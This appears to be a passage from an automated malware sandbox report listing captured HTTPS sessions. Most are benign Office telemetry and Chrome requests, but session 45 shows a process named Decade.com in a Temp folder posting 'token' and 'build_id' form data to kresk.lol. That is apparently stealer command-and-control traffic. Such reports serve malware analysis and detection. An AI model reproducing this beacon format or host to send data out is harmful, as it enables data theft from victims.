2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 Data Ascii: ------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------E3E3OPZUA1N7YU3OPH4WCont
2024-12-04 11:17:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49784	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:17 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----E3E3OPZUA1N7YU3OPH4W User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:17 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 Data Ascii: ------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------E3E3OPZUA1N7YU3OPH4WCont
2024-12-04 11:17:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:18 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:18 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:18 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111718Z-1746fd949bdl6zq5hC1EWRf3ws00000000u00000000048bs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:18 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:18 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:18 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:18 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 4ebe80de-801e-0047-51c8-457265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111718Z-1746fd949bdwt8wrhC1EWRu6rg000000016g000000006xcc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:18 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:18 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:18 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:18 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111718Z-1746fd949bdjrnwqhC1EWRpg280000000190000000001brs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:18 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:18 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:18 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:18 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111718Z-1746fd949bd77mkmhC1EWR5efc00000001eg000000002qfq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:18 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:18 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:18 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:18 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 46349be7-d01e-0017-71d1-45b035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111718Z-1746fd949bddtfvqhC1EWRxbpg0000000130000000003n25 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:18 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:20 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:20 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:20 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111720Z-1746fd949bd9x4mhhC1EWRb76n000000013g000000006y6h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:20 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49788	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:20 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:20 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:20 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 5f5d2afa-901e-0015-66cc-45b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111720Z-1746fd949bd54zxghC1EWRzre400000001eg000000002n6b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:20 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49789	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:20 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:20 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:20 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 6baa9d1a-801e-0048-02ce-45f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111720Z-1746fd949bdl6zq5hC1EWRf3ws00000000pg0000000097a2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:20 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:20 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:20 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:20 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 715419d5-801e-0078-38c7-45bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111720Z-1746fd949bdqpttnhC1EWRe1wg00000000z0000000000kaq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:20 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:20 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:21 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:20 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111720Z-1746fd949bd9x4mhhC1EWRb76n000000013g000000006y6w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:21 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49797	142.250.181.68	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
